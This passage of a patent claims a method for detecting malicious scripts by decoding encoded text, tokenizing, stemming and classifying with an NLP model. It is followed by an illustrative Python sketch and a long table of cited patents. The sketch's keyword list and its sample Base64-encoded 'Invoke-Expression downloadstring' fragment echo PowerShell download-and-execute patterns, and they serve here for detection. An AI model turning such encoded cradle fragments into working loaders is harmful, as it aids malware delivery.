33. The non-transitory storage medium of claim 32, wherein the analysis software component, deployed as part of the software agent, to perform the normalization operation by at least determining whether at least a first portion of the script text is encoded; responsive to determining that the at least first portion of the script text is encoded, determining an encoding scheme used to encode the at least first portion of the script text; and upon determining the encoding scheme, decoding the at least first portion of the script text so that the script text undergoing the normalization operation features no encoded text.
34. The non-transitory storage medium of claim 33, wherein the analysis software component, deployed as part of the software agent, to further perform the normalization operation by at least inserting a prefix before each analytic token of the plurality of analytic tokens corresponding to the decoded first portion of the script text, the prefix being a symbol signaling the NLP model to increase a scrutiny of analysis associated with each analytic token following the prefix.
35. The non-transitory storage medium of claim 33, wherein the analysis software component, deployed as part of the software agent, to perform the normalization operation that further comprises performing a tokenization operation on the script text after the decoding of the at least first portion of the script text to produce the plurality of analytic tokens.
36. The non-transitory storage medium of claim 35, wherein the analysis software component, deployed as part of the software agent, to perform the normalization operation that further comprises performing a stemmer operation on the plurality of analytic tokens of the script text to simplify a syntax associated with the plurality of analytic tokens, the stemmer operation being conducted in accordance with a prefix tree.
37. The non-transitory storage medium of claim 36, wherein the analysis software component, deployed as part of the software agent, to perform the normalization operation that further comprises updating a vocabulary data store utilized during the normalization operation on the script text with one or more sequences of characters from the script text that arise to a predetermined level of significance for use in classification of the script, the predetermined level of significance being determined in accordance with a frequency of occurrence in the script text of the one or more sequences of characters.
38. The non-transitory storage medium of claim 37, wherein the analysis software component, deployed as part of the software agent, to perform the normalization operation that further comprises reconstructing the script text to produce the normalized script by at least removing one or more words from the script so that the plurality of analytic tokens include words only stored in the vocabulary data store.
39. The non-transitory storage medium of claim 32, wherein the modeling software component, deployed as part of the software agent, applying of the NLP model to the normalized script text to at least generate model-adapted tokens corresponding to the set of tokens, from the plurality of analytic tokens, and applying the NLP model to the model-adapted tokens to produce a prediction score representing a level of maliciousness of the script.
40. The non-transitory storage medium of claim 32, wherein the modeling software component, deployed as part of the software agent, applying of the NLP model to the normalized script text by at least analyzing each of the plurality of analytic tokens after normalization using a neural network trained using the tokens associated with the corpus of at least known malicious scripts corresponding to labeled training sets of malicious tokens in order to identify any of the plurality of analytic tokens probative in classifying the script and the classifier communicatively coupled to the neural network to classify the script in accordance with a set of classification rules.
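
By way of illustration only, the normalization operations recited in claims 21 through 26 (and mirrored in claims 33 through 38) may be sketched in Python as follows. The sketch is a simplified assumption and not the claimed implementation: Base64 is assumed as the only encoding scheme, and the names DECODED_PREFIX, STEMS, build_trie, stem, try_b64, analyze, update_vocabulary and normalize, the "^" prefix symbol, the token pattern and the frequency threshold are all hypothetical choices made for this example.

```python
import base64
import re
from collections import Counter

DECODED_PREFIX = "^"   # hypothetical symbol marking tokens that came from decoded text
END = None             # trie key marking the end of a stem (cannot collide with a character)
STEMS = ["invoke-expression", "download", "powershell"]  # hypothetical stem list
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")         # candidate Base64 runs (assumed scheme)
TOKEN_RE = re.compile(r"[a-z0-9_.:/-]+")                 # hypothetical token pattern


def build_trie(words):
    """Build a prefix tree as nested dicts, one level per character."""
    root = {}
    for word in words:
        node = root
        for ch in word:
            node = node.setdefault(ch, {})
        node[END] = word
    return root


def stem(token, trie):
    """Return the longest stem in the trie that prefixes the token, else the token itself."""
    node, best = trie, None
    for ch in token:
        if ch not in node:
            break
        node = node[ch]
        if END in node:
            best = node[END]
    return best or token


def try_b64(text):
    """Return the decoded text if `text` is valid Base64 for printable UTF-8, else None."""
    try:
        decoded = base64.b64decode(text, validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return decoded if decoded.isprintable() else None


def analyze(text, trie, vocabulary, prefix):
    """Tokenize, stem, keep only vocabulary words, and prepend the given prefix."""
    stems = (stem(tok, trie) for tok in TOKEN_RE.findall(text.lower()))
    return [prefix + s for s in stems if s in vocabulary]


def update_vocabulary(vocabulary, tokens, min_count=2):
    """Add tokens whose frequency of occurrence reaches a (hypothetical) threshold."""
    counts = Counter(tokens)
    vocabulary.update(t for t, c in counts.items() if c >= min_count)


def normalize(script_text, trie, vocabulary):
    """Decode encoded portions, then tokenize, stem and filter the whole script text."""
    tokens, pos = [], 0
    for match in B64_RE.finditer(script_text):
        decoded = try_b64(match.group())
        if decoded is None:
            continue  # not actually encoded; handled as ordinary text later
        tokens += analyze(script_text[pos:match.start()], trie, vocabulary, "")
        tokens += analyze(decoded, trie, vocabulary, DECODED_PREFIX)
        pos = match.end()
    tokens += analyze(script_text[pos:], trie, vocabulary, "")
    return tokens


# Usage example with a made-up script line.
payload = base64.b64encode(b"Invoke-Expression downloadstring").decode()
vocab = {"powershell", "invoke-expression", "download"}
print(normalize("powershell -enc " + payload, build_trie(STEMS), vocab))
# prints ['powershell', '^invoke-expression', '^download']
```

In this sketch the token list returned by normalize stands in for the plurality of analytic tokens that would be supplied to the NLP model, and the prefixed tokens identify content recovered from an encoded portion of the script text. The model and classifier themselves are outside the scope of the example.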

CROSS-REFERENCE TO RELATED APPLICATIONS

This application claims the benefit of priority on U.S. Provisional Application No. 62/650,860, filed Mar. 30, 2018, the entire contents of which are incorporated by reference herein.

US Referenced Citations (713)

Number	Name	Date	Kind
4292580	Ott et al.	Sep 1981	A
5175732	Hendel et al.	Dec 1992	A
5319776	Hile et al.	Jun 1994	A
5440723	Arnold et al.	Aug 1995	A
5490249	Miller	Feb 1996	A
5657473	Killean et al.	Aug 1997	A
5802277	Cowlard	Sep 1998	A
5842002	Schnurer et al.	Nov 1998	A
5960170	Chen et al.	Sep 1999	A
5978917	Chi	Nov 1999	A
5983348	Ji	Nov 1999	A
6088803	Tso et al.	Jul 2000	A
6092194	Touboul	Jul 2000	A
6094677	Capek et al.	Jul 2000	A
6108799	Boulay et al.	Aug 2000	A
6154844	Touboul et al.	Nov 2000	A
6269330	Cidon et al.	Jul 2001	B1
6272641	Ji	Aug 2001	B1
6279113	Vaidya	Aug 2001	B1
6298445	Shostack et al.	Oct 2001	B1
6357008	Nachenberg	Mar 2002	B1
6424627	Sorhaug et al.	Jul 2002	B1
6442696	Wray et al.	Aug 2002	B1
6484315	Ziese	Nov 2002	B1
6487666	Shanklin et al.	Nov 2002	B1
6493756	O'Brien et al.	Dec 2002	B1
6550012	Villa et al.	Apr 2003	B1
6775657	Baker	Aug 2004	B1
6831893	Ben Nun et al.	Dec 2004	B1
6832367	Choi et al.	Dec 2004	B1
6895550	Kanchirayappa et al.	May 2005	B2
6898632	Gordy et al.	May 2005	B2
6907396	Muttik et al.	Jun 2005	B1
6941348	Petry et al.	Sep 2005	B2
6971097	Wallman	Nov 2005	B1
6981279	Arnold et al.	Dec 2005	B1
7007107	Ivchenko et al.	Feb 2006	B1
7028179	Anderson et al.	Apr 2006	B2
7043757	Hoefelmeyer et al.	May 2006	B2
7058822	Edery et al.	Jun 2006	B2
7069316	Gryaznov	Jun 2006	B1
7080407	Zhao et al.	Jul 2006	B1
7080408	Pak et al.	Jul 2006	B1
7093002	Wolff et al.	Aug 2006	B2
7093239	van der Made	Aug 2006	B1
7096498	Judge	Aug 2006	B2
7100201	Izatt	Aug 2006	B2
7107617	Hursey et al.	Sep 2006	B2
7159149	Spiegel et al.	Jan 2007	B2
7213260	Judge	May 2007	B2
7231667	Jordan	Jun 2007	B2
7240364	Branscomb et al.	Jul 2007	B1
7240368	Roesch et al.	Jul 2007	B1
7243371	Kasper et al.	Jul 2007	B1
7249175	Donaldson	Jul 2007	B1
7287278	Liang	Oct 2007	B2
7308716	Danford et al.	Dec 2007	B2
7328453	Merkle, Jr. et al.	Feb 2008	B2
7346486	Ivancic et al.	Mar 2008	B2
7356736	Natvig	Apr 2008	B2
7386888	Liang et al.	Jun 2008	B2
7392542	Bucher	Jun 2008	B2
7418729	Szor	Aug 2008	B2
7428300	Drew et al.	Sep 2008	B1
7441272	Durham et al.	Oct 2008	B2
7448084	Apap et al.	Nov 2008	B1
7458098	Judge et al.	Nov 2008	B2
7464404	Carpenter et al.	Dec 2008	B2
7464407	Nakae et al.	Dec 2008	B2
7467408	O'Toole, Jr.	Dec 2008	B1
7478428	Thomlinson	Jan 2009	B1
7480773	Reed	Jan 2009	B1
7487543	Arnold et al.	Feb 2009	B2
7496960	Chen et al.	Feb 2009	B1
7496961	Zimmer et al.	Feb 2009	B2
7519990	Xie	Apr 2009	B1
7523493	Liang et al.	Apr 2009	B2
7530104	Thrower et al.	May 2009	B1
7540025	Tzadikario	May 2009	B2
7546638	Anderson et al.	Jun 2009	B2
7565550	Liang et al.	Jul 2009	B2
7568233	Szor et al.	Jul 2009	B1
7584455	Ball	Sep 2009	B2
7603715	Costa et al.	Oct 2009	B2
7607171	Marsden et al.	Oct 2009	B1
7639714	Stolfo et al.	Dec 2009	B2
7644441	Schmid et al.	Jan 2010	B2
7657419	van der Made	Feb 2010	B2
7676841	Sobchuk et al.	Mar 2010	B2
7698548	Shelest et al.	Apr 2010	B2
7707633	Danford et al.	Apr 2010	B2
7712136	Sprosts et al.	May 2010	B2
7730011	Deninger et al.	Jun 2010	B1
7739740	Nachenberg et al.	Jun 2010	B1
7779463	Stolfo et al.	Aug 2010	B2
7784097	Stolfo et al.	Aug 2010	B1
7832008	Kraemer	Nov 2010	B1
7836502	Zhao et al.	Nov 2010	B1
7849506	Dansey et al.	Dec 2010	B1
7854007	Sprosts et al.	Dec 2010	B2
7869073	Oshima	Jan 2011	B2
7877803	Enstone et al.	Jan 2011	B2
7904959	Sidiroglou et al.	Mar 2011	B2
7908660	Bahl	Mar 2011	B2
7930738	Petersen	Apr 2011	B1
7937387	Frazier et al.	May 2011	B2
7937761	Bennett	May 2011	B1
7949849	Lowe et al.	May 2011	B2
7996556	Raghavan et al.	Aug 2011	B2
7996836	McCorkendale et al.	Aug 2011	B1
7996904	Chiueh et al.	Aug 2011	B1
7996905	Arnold et al.	Aug 2011	B2
8006305	Aziz	Aug 2011	B2
8010667	Zhang et al.	Aug 2011	B2
8020206	Hubbard et al.	Sep 2011	B2
8028338	Schneider et al.	Sep 2011	B1
8042184	Batenin	Oct 2011	B1
8045094	Teragawa	Oct 2011	B2
8045458	Alperovitch et al.	Oct 2011	B2
8069484	McMillan et al.	Nov 2011	B2
8087086	Lai et al.	Dec 2011	B1
8171553	Aziz et al.	May 2012	B2
8176049	Deninger et al.	May 2012	B2
8176480	Spertus	May 2012	B1
8201246	Wu et al.	Jun 2012	B1
8204984	Aziz et al.	Jun 2012	B1
8214905	Doukhvalov et al.	Jul 2012	B1
8220055	Kennedy	Jul 2012	B1
8225288	Miller et al.	Jul 2012	B2
8225373	Kraemer	Jul 2012	B2
8233882	Rogel	Jul 2012	B2
8234640	Fitzgerald et al.	Jul 2012	B1
8234709	Viljoen et al.	Jul 2012	B2
8239944	Nachenberg et al.	Aug 2012	B1
8260914	Ranjan	Sep 2012	B1
8266091	Gubin et al.	Sep 2012	B1
8286251	Eker et al.	Oct 2012	B2
8291499	Aziz et al.	Oct 2012	B2
8307435	Mann et al.	Nov 2012	B1
8307443	Wang et al.	Nov 2012	B2
8312545	Tuvell et al.	Nov 2012	B2
8321936	Green et al.	Nov 2012	B1
8321941	Tuvell et al.	Nov 2012	B2
8332571	Edwards, Sr.	Dec 2012	B1
8365286	Poston	Jan 2013	B2
8365297	Parshin et al.	Jan 2013	B1
8370938	Daswani et al.	Feb 2013	B1
8370939	Zaitsev et al.	Feb 2013	B2
8375444	Aziz et al.	Feb 2013	B2
8381299	Stolfo et al.	Feb 2013	B2
8402529	Green et al.	Mar 2013	B1
8464340	Ahn et al.	Jun 2013	B2
8479174	Chiriac	Jul 2013	B2
8479276	Vaystikh et al.	Jul 2013	B1
8479291	Bodke	Jul 2013	B1
8510827	Leake et al.	Aug 2013	B1
8510828	Guo et al.	Aug 2013	B1
8510842	Amit et al.	Aug 2013	B2
8516478	Edwards et al.	Aug 2013	B1
8516590	Ranadive et al.	Aug 2013	B1
8516593	Aziz	Aug 2013	B2
8522348	Chen et al.	Aug 2013	B2
8528086	Aziz	Sep 2013	B1
8533824	Hutton et al.	Sep 2013	B2
8539582	Aziz et al.	Sep 2013	B1
8549638	Aziz	Oct 2013	B2
8555391	Demir et al.	Oct 2013	B1
8561177	Aziz et al.	Oct 2013	B1
8566476	Shiffer et al.	Oct 2013	B2
8566946	Aziz et al.	Oct 2013	B1
8584094	Dadhia et al.	Nov 2013	B2
8584234	Sobel et al.	Nov 2013	B1
8584239	Aziz et al.	Nov 2013	B2
8595834	Xie et al.	Nov 2013	B2
8627476	Satish et al.	Jan 2014	B1
8635696	Aziz	Jan 2014	B1
8682054	Xue et al.	Mar 2014	B2
8682812	Ranjan	Mar 2014	B1
8689333	Aziz	Apr 2014	B2
8695096	Zhang	Apr 2014	B1
8713631	Pavlyushchik	Apr 2014	B1
8713681	Silberman et al.	Apr 2014	B2
8726392	McCorkendale et al.	May 2014	B1
8739280	Chess et al.	May 2014	B2
8776229	Aziz	Jul 2014	B1
8782792	Bodke	Jul 2014	B1
8789172	Stolfo et al.	Jul 2014	B2
8789178	Kejriwal et al.	Jul 2014	B2
8793278	Frazier et al.	Jul 2014	B2
8793787	Ismael et al.	Jul 2014	B2
8805947	Kuzkin et al.	Aug 2014	B1
8806647	Daswani et al.	Aug 2014	B1
8832829	Manni et al.	Sep 2014	B2
8838992	Zhu	Sep 2014	B1
8850570	Ramzan	Sep 2014	B1
8850571	Staniford et al.	Sep 2014	B2
8881234	Narasimhan et al.	Nov 2014	B2
8881271	Butler, II	Nov 2014	B2
8881282	Aziz et al.	Nov 2014	B1
8898788	Aziz et al.	Nov 2014	B1
8935779	Manni et al.	Jan 2015	B2
8949257	Shiffer et al.	Feb 2015	B2
8984638	Aziz et al.	Mar 2015	B1
8990939	Staniford et al.	Mar 2015	B2
8990944	Singh et al.	Mar 2015	B1
8997219	Staniford et al.	Mar 2015	B2
9009822	Ismael et al.	Apr 2015	B1
9009823	Ismael et al.	Apr 2015	B1
9027135	Aziz	May 2015	B1
9071638	Aziz et al.	Jun 2015	B1
9104867	Thioux et al.	Aug 2015	B1
9106630	Frazier et al.	Aug 2015	B2
9106694	Aziz et al.	Aug 2015	B2
9118715	Staniford et al.	Aug 2015	B2
9159035	Ismael et al.	Oct 2015	B1
9171160	Vincent et al.	Oct 2015	B2
9176843	Ismael et al.	Nov 2015	B1
9189627	Islam	Nov 2015	B1
9195829	Goradia et al.	Nov 2015	B1
9197664	Aziz et al.	Nov 2015	B1
9223972	Vincent et al.	Dec 2015	B1
9225740	Ismael et al.	Dec 2015	B1
9241010	Bennett et al.	Jan 2016	B1
9251343	Vincent et al.	Feb 2016	B1
9262635	Paithane et al.	Feb 2016	B2
9268936	Butler	Feb 2016	B2
9275229	LeMasters	Mar 2016	B2
9282109	Aziz et al.	Mar 2016	B1
9292686	Ismael et al.	Mar 2016	B2
9294501	Mesdaq et al.	Mar 2016	B2
9300686	Pidathala et al.	Mar 2016	B2
9306960	Aziz	Apr 2016	B1
9306974	Aziz et al.	Apr 2016	B1
9311479	Manni et al.	Apr 2016	B1
9355247	Thioux et al.	May 2016	B1
9356944	Aziz	May 2016	B1
9363280	Rivlin et al.	Jun 2016	B1
9367681	Ismael et al.	Jun 2016	B1
9398028	Karandikar et al.	Jul 2016	B1
9413781	Cunningham et al.	Aug 2016	B2
9426071	Caldejon et al.	Aug 2016	B1
9430646	Mushtaq et al.	Aug 2016	B1
9432389	Khalid et al.	Aug 2016	B1
9438613	Paithane et al.	Sep 2016	B1
9438622	Staniford et al.	Sep 2016	B1
9438623	Thioux et al.	Sep 2016	B1
9459901	Jung et al.	Oct 2016	B2
9467460	Otvagin et al.	Oct 2016	B1
9483644	Paithane et al.	Nov 2016	B1
9495180	Ismael	Nov 2016	B2
9497213	Thompson et al.	Nov 2016	B2
9507935	Ismael et al.	Nov 2016	B2
9516057	Aziz	Dec 2016	B2
9519782	Aziz et al.	Dec 2016	B2
9536091	Paithane et al.	Jan 2017	B2
9537972	Edwards et al.	Jan 2017	B1
9560059	Islam	Jan 2017	B1
9565202	Kindlund et al.	Feb 2017	B1
9591015	Amin et al.	Mar 2017	B1
9591020	Aziz	Mar 2017	B1
9594904	Jain et al.	Mar 2017	B1
9594905	Ismael et al.	Mar 2017	B1
9594912	Thioux et al.	Mar 2017	B1
9609007	Rivlin et al.	Mar 2017	B1
9626509	Khalid et al.	Apr 2017	B1
9628498	Aziz et al.	Apr 2017	B1
9628507	Haq et al.	Apr 2017	B2
9633134	Ross	Apr 2017	B2
9635039	Islam et al.	Apr 2017	B1
9641546	Manni et al.	May 2017	B1
9654485	Neumann	May 2017	B1
9661009	Karandikar et al.	May 2017	B1
9661018	Aziz	May 2017	B1
9674298	Edwards et al.	Jun 2017	B1
9680862	Ismael et al.	Jun 2017	B2
9690606	Ha et al.	Jun 2017	B1
9690933	Singh et al.	Jun 2017	B1
9690935	Shiffer et al.	Jun 2017	B2
9690936	Malik et al.	Jun 2017	B1
9736179	Ismael	Aug 2017	B2
9740857	Ismael et al.	Aug 2017	B2
9747446	Pidathala et al.	Aug 2017	B1
9756074	Aziz et al.	Sep 2017	B2
9773112	Rathor et al.	Sep 2017	B1
9781144	Otvagin et al.	Oct 2017	B1
9787700	Amin et al.	Oct 2017	B1
9787706	Otvagin et al.	Oct 2017	B1
9792196	Ismael et al.	Oct 2017	B1
9824209	Ismael et al.	Nov 2017	B1
9824211	Wilson	Nov 2017	B2
9824216	Khalid et al.	Nov 2017	B1
9825976	Gomez et al.	Nov 2017	B1
9825989	Mehra et al.	Nov 2017	B1
9838408	Karandikar et al.	Dec 2017	B1
9838411	Aziz	Dec 2017	B1
9838416	Aziz	Dec 2017	B1
9838417	Khalid et al.	Dec 2017	B1
9846776	Paithane et al.	Dec 2017	B1
9876701	Caldejon et al.	Jan 2018	B1
9888016	Amin et al.	Feb 2018	B1
9888019	Pidathala et al.	Feb 2018	B1
9910988	Vincent et al.	Mar 2018	B1
9912644	Cunningham	Mar 2018	B2
9912681	Ismael et al.	Mar 2018	B1
9912684	Aziz et al.	Mar 2018	B1
9912691	Mesdaq et al.	Mar 2018	B2
9912698	Thioux et al.	Mar 2018	B1
9916440	Paithane et al.	Mar 2018	B1
9921978	Chan et al.	Mar 2018	B1
9934376	Ismael	Apr 2018	B1
9934381	Kindlund et al.	Apr 2018	B1
9946568	Ismael et al.	Apr 2018	B1
9954890	Staniford et al.	Apr 2018	B1
9973531	Thioux	May 2018	B1
10002252	Ismael et al.	Jun 2018	B2
10019338	Goradia et al.	Jul 2018	B1
10019573	Silberman et al.	Jul 2018	B2
10025691	Ismael et al.	Jul 2018	B1
10025927	Khalid et al.	Jul 2018	B1
10027689	Rathor et al.	Jul 2018	B1
10027690	Aziz et al.	Jul 2018	B2
10027696	Rivlin et al.	Jul 2018	B1
10033747	Paithane et al.	Jul 2018	B1
10033748	Cunningham et al.	Jul 2018	B1
10033753	Islam et al.	Jul 2018	B1
10033759	Kabra et al.	Jul 2018	B1
10050998	Singh	Aug 2018	B1
10068091	Aziz et al.	Sep 2018	B1
10075455	Zafar et al.	Sep 2018	B2
10083302	Paithane et al.	Sep 2018	B1
10084813	Eyada	Sep 2018	B2
10089461	Ha et al.	Oct 2018	B1
10097573	Aziz	Oct 2018	B1
10104102	Neumann	Oct 2018	B1
10108446	Steinberg et al.	Oct 2018	B1
10121000	Rivlin et al.	Nov 2018	B1
10122746	Manni et al.	Nov 2018	B1
10133863	Bu et al.	Nov 2018	B2
10133866	Kumar et al.	Nov 2018	B1
10146810	Shiffer et al.	Dec 2018	B2
10148693	Singh et al.	Dec 2018	B2
10165000	Aziz et al.	Dec 2018	B1
10169585	Pilipenko et al.	Jan 2019	B1
10176321	Abbasi et al.	Jan 2019	B2
10181029	Ismael et al.	Jan 2019	B1
10191861	Steinberg et al.	Jan 2019	B1
10192052	Singh et al.	Jan 2019	B1
10198574	Thioux et al.	Feb 2019	B1
10200384	Mushtaq et al.	Feb 2019	B1
10210329	Malik et al.	Feb 2019	B1
10216927	Steinberg	Feb 2019	B1
10218740	Mesdaq et al.	Feb 2019	B1
10242185	Goradia	Mar 2019	B1
20010005889	Albrecht	Jun 2001	A1
20010047326	Broadbent et al.	Nov 2001	A1
20020018903	Kokubo et al.	Feb 2002	A1
20020038430	Edwards et al.	Mar 2002	A1
20020091819	Melchione et al.	Jul 2002	A1
20020095607	Lin-Hendel	Jul 2002	A1
20020116627	Tarbotton et al.	Aug 2002	A1
20020144156	Copeland	Oct 2002	A1
20020162015	Tang	Oct 2002	A1
20020166063	Lachman et al.	Nov 2002	A1
20020169952	DiSanto et al.	Nov 2002	A1
20020184528	Shevenell et al.	Dec 2002	A1
20020188887	Largman et al.	Dec 2002	A1
20020194490	Halperin et al.	Dec 2002	A1
20030021728	Sharpe et al.	Jan 2003	A1
20030074578	Ford et al.	Apr 2003	A1
20030084318	Schertz	May 2003	A1
20030101381	Mateev et al.	May 2003	A1
20030115483	Liang	Jun 2003	A1
20030188190	Aaron et al.	Oct 2003	A1
20030191957	Hypponen et al.	Oct 2003	A1
20030200460	Morota et al.	Oct 2003	A1
20030212902	van der Made	Nov 2003	A1
20030229801	Kouznetsov et al.	Dec 2003	A1
20030237000	Denton et al.	Dec 2003	A1
20040003323	Bennett et al.	Jan 2004	A1
20040006473	Mills et al.	Jan 2004	A1
20040015712	Szor	Jan 2004	A1
20040019832	Arnold et al.	Jan 2004	A1
20040047356	Bauer	Mar 2004	A1
20040083408	Spiegel et al.	Apr 2004	A1
20040088581	Brawn et al.	May 2004	A1
20040093513	Cantrell et al.	May 2004	A1
20040111531	Staniford et al.	Jun 2004	A1
20040117478	Triulzi et al.	Jun 2004	A1
20040117624	Brandt et al.	Jun 2004	A1
20040128355	Chao et al.	Jul 2004	A1
20040165588	Pandya	Aug 2004	A1
20040236963	Danford et al.	Nov 2004	A1
20040243349	Greifeneder et al.	Dec 2004	A1
20040249911	Alkhatib et al.	Dec 2004	A1
20040255161	Cavanaugh	Dec 2004	A1
20040268147	Wiederin et al.	Dec 2004	A1
20050005159	Oliphant	Jan 2005	A1
20050021740	Bar et al.	Jan 2005	A1
20050033960	Vialen et al.	Feb 2005	A1
20050033989	Poletto et al.	Feb 2005	A1
20050050148	Mohammadioun et al.	Mar 2005	A1
20050086523	Zimmer et al.	Apr 2005	A1
20050091513	Mitomo et al.	Apr 2005	A1
20050091533	Omote et al.	Apr 2005	A1
20050091652	Ross et al.	Apr 2005	A1
20050108562	Khazan et al.	May 2005	A1
20050114663	Cornell et al.	May 2005	A1
20050125195	Brendel	Jun 2005	A1
20050149726	Joshi et al.	Jul 2005	A1
20050157662	Bingham et al.	Jul 2005	A1
20050183143	Anderholm et al.	Aug 2005	A1
20050201297	Peikari	Sep 2005	A1
20050210533	Copeland et al.	Sep 2005	A1
20050238005	Chen et al.	Oct 2005	A1
20050240781	Gassoway	Oct 2005	A1
20050262562	Gassoway	Nov 2005	A1
20050265331	Stolfo	Dec 2005	A1
20050283839	Cowburn	Dec 2005	A1
20060010495	Cohen et al.	Jan 2006	A1
20060015416	Hoffman et al.	Jan 2006	A1
20060015715	Anderson	Jan 2006	A1
20060015747	Van de Ven	Jan 2006	A1
20060021029	Brickell et al.	Jan 2006	A1
20060021054	Costa et al.	Jan 2006	A1
20060031476	Mathes et al.	Feb 2006	A1
20060047665	Neil	Mar 2006	A1
20060070130	Costea et al.	Mar 2006	A1
20060075496	Carpenter et al.	Apr 2006	A1
20060095968	Portolani et al.	May 2006	A1
20060101516	Sudaharan et al.	May 2006	A1
20060101517	Banzhof et al.	May 2006	A1
20060117385	Mester et al.	Jun 2006	A1
20060123477	Raghavan et al.	Jun 2006	A1
20060143709	Brooks et al.	Jun 2006	A1
20060150249	Gassen et al.	Jul 2006	A1
20060161983	Cothrell et al.	Jul 2006	A1
20060161987	Levy-Yurista	Jul 2006	A1
20060161989	Reshef et al.	Jul 2006	A1
20060164199	Gilde et al.	Jul 2006	A1
20060173992	Weber et al.	Aug 2006	A1
20060179147	Tran et al.	Aug 2006	A1
20060184632	Marino et al.	Aug 2006	A1
20060191010	Benjamin	Aug 2006	A1
20060221956	Narayan et al.	Oct 2006	A1
20060236393	Kramer et al.	Oct 2006	A1
20060242709	Seinfeld et al.	Oct 2006	A1
20060248519	Jaeger et al.	Nov 2006	A1
20060248582	Panjwani et al.	Nov 2006	A1
20060251104	Koga	Nov 2006	A1
20060288417	Bookbinder et al.	Dec 2006	A1
20070006288	Mayfield et al.	Jan 2007	A1
20070006313	Porras et al.	Jan 2007	A1
20070011174	Takaragi et al.	Jan 2007	A1
20070016951	Piccard et al.	Jan 2007	A1
20070019286	Kikuchi	Jan 2007	A1
20070033645	Jones	Feb 2007	A1
20070038943	FitzGerald et al.	Feb 2007	A1
20070064689	Shin et al.	Mar 2007	A1
20070074169	Chess et al.	Mar 2007	A1
20070094730	Bhikkaji et al.	Apr 2007	A1
20070101435	Konanka et al.	May 2007	A1
20070128855	Cho et al.	Jun 2007	A1
20070142030	Sinha et al.	Jun 2007	A1
20070143827	Nicodemus et al.	Jun 2007	A1
20070156895	Vuong	Jul 2007	A1
20070157180	Tillmann et al.	Jul 2007	A1
20070157306	Elrod et al.	Jul 2007	A1
20070168988	Eisner et al.	Jul 2007	A1
20070171824	Ruello et al.	Jul 2007	A1
20070174915	Gribble et al.	Jul 2007	A1
20070192500	Lum	Aug 2007	A1
20070192858	Lum	Aug 2007	A1
20070198275	Malden et al.	Aug 2007	A1
20070208822	Wang et al.	Sep 2007	A1
20070220607	Sprosts et al.	Sep 2007	A1
20070240218	Tuvell et al.	Oct 2007	A1
20070240219	Tuvell et al.	Oct 2007	A1
20070240220	Tuvell et al.	Oct 2007	A1
20070240222	Tuvell et al.	Oct 2007	A1
20070250930	Aziz et al.	Oct 2007	A1
20070256132	Oliphant	Nov 2007	A2
20070271446	Nakamura	Nov 2007	A1
20080005782	Aziz	Jan 2008	A1
20080018122	Zierler et al.	Jan 2008	A1
20080028463	Dagon et al.	Jan 2008	A1
20080040710	Chiriac	Feb 2008	A1
20080046781	Childs et al.	Feb 2008	A1
20080066179	Liu	Mar 2008	A1
20080072326	Danford et al.	Mar 2008	A1
20080077793	Tan et al.	Mar 2008	A1
20080080518	Hoeflin et al.	Apr 2008	A1
20080086720	Lekel	Apr 2008	A1
20080098476	Syversen	Apr 2008	A1
20080120722	Sima et al.	May 2008	A1
20080134178	Fitzgerald et al.	Jun 2008	A1
20080134334	Kim et al.	Jun 2008	A1
20080141376	Clausen et al.	Jun 2008	A1
20080184367	McMillan et al.	Jul 2008	A1
20080184373	Traut et al.	Jul 2008	A1
20080189787	Arnold et al.	Aug 2008	A1
20080201778	Guo et al.	Aug 2008	A1
20080209557	Herley et al.	Aug 2008	A1
20080215742	Goldszmidt et al.	Sep 2008	A1
20080222729	Chen et al.	Sep 2008	A1
20080263665	Ma et al.	Oct 2008	A1
20080295172	Bohacek	Nov 2008	A1
20080301810	Lehane et al.	Dec 2008	A1
20080307524	Singh et al.	Dec 2008	A1
20080313738	Enderby	Dec 2008	A1
20080320594	Jiang	Dec 2008	A1
20090003317	Kasralikar et al.	Jan 2009	A1
20090007100	Field et al.	Jan 2009	A1
20090013408	Schipka	Jan 2009	A1
20090031423	Liu et al.	Jan 2009	A1
20090036111	Danford et al.	Feb 2009	A1
20090037835	Goldman	Feb 2009	A1
20090044024	Oberheide et al.	Feb 2009	A1
20090044274	Budko et al.	Feb 2009	A1
20090064332	Porras et al.	Mar 2009	A1
20090077666	Chen et al.	Mar 2009	A1
20090083369	Marmor	Mar 2009	A1
20090083855	Apap et al.	Mar 2009	A1
20090089879	Wang et al.	Apr 2009	A1
20090094697	Provos et al.	Apr 2009	A1
20090113425	Ports et al.	Apr 2009	A1
20090125976	Wassermann et al.	May 2009	A1
20090126015	Monastyrsky et al.	May 2009	A1
20090126016	Sobko et al.	May 2009	A1
20090133125	Choi et al.	May 2009	A1
20090144823	Lamastra et al.	Jun 2009	A1
20090158430	Borders	Jun 2009	A1
20090172815	Gu et al.	Jul 2009	A1
20090187992	Poston	Jul 2009	A1
20090193293	Stolfo et al.	Jul 2009	A1
20090198651	Shiffer et al.	Aug 2009	A1
20090198670	Shiffer et al.	Aug 2009	A1
20090198689	Frazier et al.	Aug 2009	A1
20090199274	Frazier et al.	Aug 2009	A1
20090199296	Xie et al.	Aug 2009	A1
20090228233	Anderson et al.	Sep 2009	A1
20090241187	Troyansky	Sep 2009	A1
20090241190	Todd et al.	Sep 2009	A1
20090265692	Godefroid et al.	Oct 2009	A1
20090271867	Zhang	Oct 2009	A1
20090300415	Zhang et al.	Dec 2009	A1
20090300761	Park et al.	Dec 2009	A1
20090328185	Berg et al.	Dec 2009	A1
20090328221	Blumfield et al.	Dec 2009	A1
20100005146	Drako et al.	Jan 2010	A1
20100011205	McKenna	Jan 2010	A1
20100017546	Poo et al.	Jan 2010	A1
20100030996	Butler, II	Feb 2010	A1
20100031353	Thomas et al.	Feb 2010	A1
20100037314	Perdisci et al.	Feb 2010	A1
20100043073	Kuwamura	Feb 2010	A1
20100054278	Stolfo et al.	Mar 2010	A1
20100058474	Hicks	Mar 2010	A1
20100064044	Nonoyama	Mar 2010	A1
20100077481	Polyakov et al.	Mar 2010	A1
20100083376	Pereira et al.	Apr 2010	A1
20100115621	Staniford et al.	May 2010	A1
20100132038	Zaitsev	May 2010	A1
20100154056	Smith et al.	Jun 2010	A1
20100180344	Malyshev et al.	Jul 2010	A1
20100192223	Ismael et al.	Jul 2010	A1
20100220863	Dupaquis et al.	Sep 2010	A1
20100235831	Dittmer	Sep 2010	A1
20100251104	Massand	Sep 2010	A1
20100281102	Chinta et al.	Nov 2010	A1
20100281541	Stolfo et al.	Nov 2010	A1
20100281542	Stolfo et al.	Nov 2010	A1
